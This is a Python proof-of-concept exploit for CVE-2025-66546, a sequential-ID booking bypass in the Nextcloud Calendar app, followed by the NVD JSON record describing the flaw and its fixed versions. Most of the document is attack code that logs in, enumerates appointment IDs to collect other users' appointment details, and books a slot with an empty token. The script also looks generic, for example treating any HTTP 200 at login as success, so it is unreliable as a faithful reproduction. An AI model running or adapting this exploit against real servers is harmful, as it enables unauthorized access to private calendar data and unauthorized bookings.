CVE-2025-66546

# CVE-2025-66546 PoC - Nextcloud Calendar Sequential ID Booking Bypass # This PoC demonstrates the vulnerability where appointment booking can be done # with sequential IDs without knowing the appointment token import requests import json # Configuration NEXTCLOUD_URL = "https://vulnerable-nextcloud-server.com" USERNAME = "attacker" PASSWORD = "password" TARGET_CALENDAR_ID = "calendar123" def authenticate(): """Authenticate to Nextcloud and get session token""" session = requests.Session() login_url = f"{NEXTCLOUD_URL}/index.php/login" # Perform login response = session.post(login_url, data={ "user": USERNAME, "password": PASSWORD }) if response.status_code == 200: return session return None def book_appointment_sequential_id(session, calendar_id, sequential_id, start_time, end_time): """ Attempt to book an appointment using sequential ID bypass The vulnerability allows booking without knowing the actual appointment token """ booking_url = f"{NEXTCLOUD_URL}/apps/calendar/ajax/booking/book.php" # Malicious payload exploiting sequential ID payload = { "calendar_id": calendar_id, "appointment_id": sequential_id, # Sequential ID instead of token "start": start_time, "end": end_time, "token": "" # Empty or invalid token } response = session.post(booking_url, json=payload) return response.json() def enumerate_appointments(session, calendar_id, start_id=1, end_id=100): """ Enumerate and access appointments using sequential IDs Demonstrates unauthorized access to other users' appointments """ appointments = [] view_url = f"{NEXTCLOUD_URL}/apps/calendar/ajax/appointment/view.php" for appointment_id in range(start_id, end_id + 1): params = { "calendar_id": calendar_id, "appointment_id": appointment_id } response = session.get(view_url, params=params) if response.status_code == 200: data = response.json() if data.get("success"): appointments.append({ "id": appointment_id, "details": data.get("data", {}) }) return appointments def main(): """Main exploitation routine""" print("[*] CVE-2025-66546 Nextcloud Calendar Sequential ID Bypass PoC") print("[*] Description: Calendar app allowed blindly booking appointments with sequential ID") # Step 1: Authenticate session = authenticate() if not session: print("[-] Authentication failed") return print("[+] Authentication successful") # Step 2: Enumerate appointments using sequential IDs print("[*] Enumerating appointments with sequential IDs...") appointments = enumerate_appointments(session, TARGET_CALENDAR_ID, 1, 50) print(f"[+] Found {len(appointments)} accessible appointments") # Step 3: Book an appointment without knowing the token print("[*] Attempting to book appointment with sequential ID bypass...") result = book_appointment_sequential_id( session, TARGET_CALENDAR_ID, 42, # Sequential ID "2025-01-15T10:00:00", "2025-01-15T11:00:00" ) if result.get("success"): print("[!] VULNERABLE: Successfully booked appointment without valid token") else: print("[-] Patch applied or access denied") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-66546", "sourceIdentifier": "[email protected]", "published": "2025-12-05T17:16:05.163", "lastModified": "2025-12-09T16:36:01.357", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nextcloud Calendar is a calendar app for Nextcloud. Prior to 4.7.19, 5.5.6, and 6.0.1, the calendar app allowed blindly booking appointments with a squential ID without known the appointment token. This vulnerability is fixed in 4.7.19, 5.5.6, and 6.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:calendar:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.7.19", "matchCriteriaId": "84E1FFC4-516D-4680-9F67-E66C1FAE5E0B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:calendar:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.5.6", "matchCriteriaId": "3E716F13-981B-49BA-98FF-3B52C9962EA2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:calendar:6.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "5FEEB806-FB4C-42B4-BE4E-297AB95A854F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:calendar:6.0.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "B1A878DF-8A9B-4987-8E2C-6873CA2C8427"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:calendar:6.0.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "9B9884CA-4E88-4AB3-BA37-FAF9E845F04E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:calendar:6.0.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "032400B7-AE78-467F-81CC-83164AC29796"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:calendar:6.0.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "D1A265F6-884F-44FF-B00F-CB5F7E704E0E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:calendar:6.0.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "8249ACE0-0485-4485-B628-D157E57A91C0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:calendar:6.0.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "508556C9-5596-42B5-AD76-8156A42FEED7"}]}]}], "references": [{"url": "https://github.com/nextcloud/calendar/commit/f41650c3681fc4a4130eb883f5c0899c011326b3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nextcloud/calendar/pull/7537", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-7x2j-2674-fj95", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://hackerone.com/reports/3275810", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}